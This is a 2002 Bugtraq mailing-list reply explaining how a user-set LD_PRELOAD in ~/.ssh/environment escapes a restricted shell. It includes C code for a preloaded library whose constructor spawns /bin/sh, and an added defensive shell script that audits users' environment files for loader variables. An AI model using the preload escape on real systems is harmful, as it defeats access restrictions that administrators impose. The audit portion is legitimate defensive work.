Re: ssh environment - circumvention of restricted shells

From: ari (edelkind-bugtraqat_private)
Date: Wed Jun 26 2002 - 21:54:53 PDT


    lsawyerat_private said this stuff:
    
    [...]
    > I've tried this 'exploit' on both Linux 2.4.14 (redhat) and Solaris 2.8
    > boxen, and have been unable to get a shell.  The shell process is there,
    > but fails to communicate with the network socket.  
    
    Ah; /bin/sh is shared on your system as well.  To get around this, try
    the following code for evil.so:
    
    -----
    #include <unistd.h>
    #include <stdlib.h>
    
    /* Constructor run by ld.so when the library is preloaded. */
    void _init (void) {
    	/* Drop LD_PRELOAD first so the child /bin/sh is not preloaded again. */
    	unsetenv("LD_PRELOAD");
    	/* The execl(3) argument list ends with a NULL pointer, not a bare 0. */
    	execl("/bin/sh", "sh", (char *)NULL);
    }
    -----
    
    > *** However ***, if I replace "/bin/sh" with "ping some.ip.add.ress" and
    > attempt the connection, I'm greeted with the following:
    > 
    > 	Last login: today from somehost
    > 	Sun Microsystems Inc.  SunOS 5.8
    > 	ld.so.1: ping: warning: /homes/evil/.ssh/evil.so: open failed:
    > illegal insecure pathname
    > 	some.ip.add.ress is alive
    > 	Connection to target closed.
    
    Your 'ping' binary is probably setuid-root.  What happens is, the shared
    library executes ping, but the LD_PRELOAD environment variable hasn't
    gone anywhere.  When ping executes, ld.so sees LD_PRELOAD (which is
    forbidden for setuid programs), complains, and doesn't execute it.
    
    On the other hand, when executing your shared /bin/sh, every /bin/sh
    process once again preloads evil.so, creating an infinite execl(3) loop.
    The code above should account for that.
    
    ari
    
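The thread turns on sshd reading a user-controlled ~/.ssh/environment file and exporting whatever it contains, LD_PRELOAD included, into the login session. The following POSIX sh script is an added example from the defender's side, not code from the original post: it walks the home directories under a base path, reads each ~/.ssh/environment the way sshd does (skipping blank and comment lines), and reports any line that sets a dynamic-loader variable. The base-directory layout, the variable list in LOADER_VARS, and the two sample environment files built by demo() are constructed for this example. (Later OpenSSH releases added the sshd_config option PermitUserEnvironment, default no, which disables this file entirely; the script is for hosts where that option is enabled or for older daemons.)

```shell
#!/bin/sh
# Added example, not part of the original Bugtraq post: audit per-user
# ~/.ssh/environment files for variables that change ld.so behaviour.
# The variable list and directory layout are assumptions for this demo.

# Environment variables that alter how the dynamic loader resolves or
# preloads shared objects.
LOADER_VARS='LD_PRELOAD LD_LIBRARY_PATH LD_AUDIT'

# scan_env_file FILE
# Prints each offending NAME=value line.  Returns 1 if any were found,
# 0 if the file is clean or absent.  Blank and '#' lines are skipped,
# mirroring how sshd parses ~/.ssh/environment.
scan_env_file() {
    file=$1
    found=0
    [ -f "$file" ] || return 0
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*) continue ;;
        esac
        name=${line%%=*}
        for v in $LOADER_VARS; do
            if [ "$name" = "$v" ]; then
                printf '%s: %s\n' "$file" "$line"
                found=1
            fi
        done
    done < "$file"
    return $found
}

# scan_homes DIR
# Checks DIR/*/.ssh/environment for every user directory under DIR and
# prints, as the last line of output, the number of users flagged.
scan_homes() {
    base=$1
    hits=0
    for d in "$base"/*/; do
        [ -d "$d" ] || continue
        scan_env_file "$d.ssh/environment" || hits=$((hits + 1))
    done
    echo "$hits"
}

# demo: runs the audit over two constructed home directories in a scratch
# location, so nothing system-wide is read.  One user is clean, the other
# preloads a library from their own .ssh directory.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/alice/.ssh" "$tmp/evil/.ssh"
    printf 'EDITOR=vi\n# harmless comment\n' > "$tmp/alice/.ssh/environment"
    printf 'PATH=/usr/bin\nLD_PRELOAD=/homes/evil/.ssh/evil.so\n' \
        > "$tmp/evil/.ssh/environment"
    scan_homes "$tmp"
    rm -rf "$tmp"
}
```

Run `demo` to see one finding (the LD_PRELOAD line under the second user) followed by the count `1`; in real use, call `scan_homes /home` instead. Matching on the variable name rather than the value is deliberate: an LD_PRELOAD entry is worth a look regardless of what it points at, and the same applies to LD_LIBRARY_PATH, which can redirect a non-setuid binary's library lookups just as effectively.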
    This archive was generated by hypermail 2b30 : Thu Jun 27 2002 - 17:01:16 PDT